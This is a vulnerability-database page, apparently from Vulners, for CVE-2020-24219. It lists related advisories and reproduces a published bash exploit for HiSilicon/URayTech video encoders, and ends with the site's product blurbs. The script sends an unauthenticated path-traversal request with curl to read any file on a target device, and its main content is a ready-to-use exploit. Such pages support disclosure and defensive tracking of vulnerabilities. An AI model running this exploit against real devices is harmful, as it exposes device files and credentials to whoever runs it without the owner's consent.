| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2020-24219 | 21 Feb 202512:27 | – | circl | |
| Arbitrary Command Injection Over HTTP Traffic (CVE-2020-19165; CVE-2020-24219; CVE-2020-28477; CVE-2021-26747; CVE-2021-27328) | 24 Feb 202100:00 | – | checkpoint_advisories | |
| CVE-2020-24219 | 6 Oct 202013:16 | – | cve | |
| CVE-2020-24219 | 6 Oct 202013:16 | – | cvelist | |
| CVE-2020-24219 | 6 Oct 202014:15 | – | nvd | |
| HiSilicon Encoder Directory Traversal Vulnerability - Active Check | 24 Sep 202000:00 | – | openvas | |
| CVE-2020-24219 | 6 Oct 202014:15 | – | osv | |
| HiSilicon Video Encoder 1.97 File Disclosure / Path Traversal | 19 Oct 202000:00 | – | packetstorm | |
| Path traversal | 6 Oct 202014:15 | – | prion | |
| IPTV encoder devices contain multiple vulnerabilities | 15 Sep 202000:00 | – | cert |
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - unauthenticated file disclosure via path traversal
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: https://www.szuray.com/
# Software Link: N/A
# Version: up to 1.97
# Tested on: Linux
# CVE: CVE-2020-24219
# Vendors: URayTech
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
if [ "$#" -ne 2 ]
then
echo "Usage: $0 <server>[:<port>] <filepath>"
echo "Example: $0 1.2.3.4:8086 /box/box.ini"
exit 1
fi
curl -s --path-as-is "http://$1/../../sys/devices/media/13070000.jpgd/../../../..$2" \
|| echo "ERROR: curl returned $?"Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation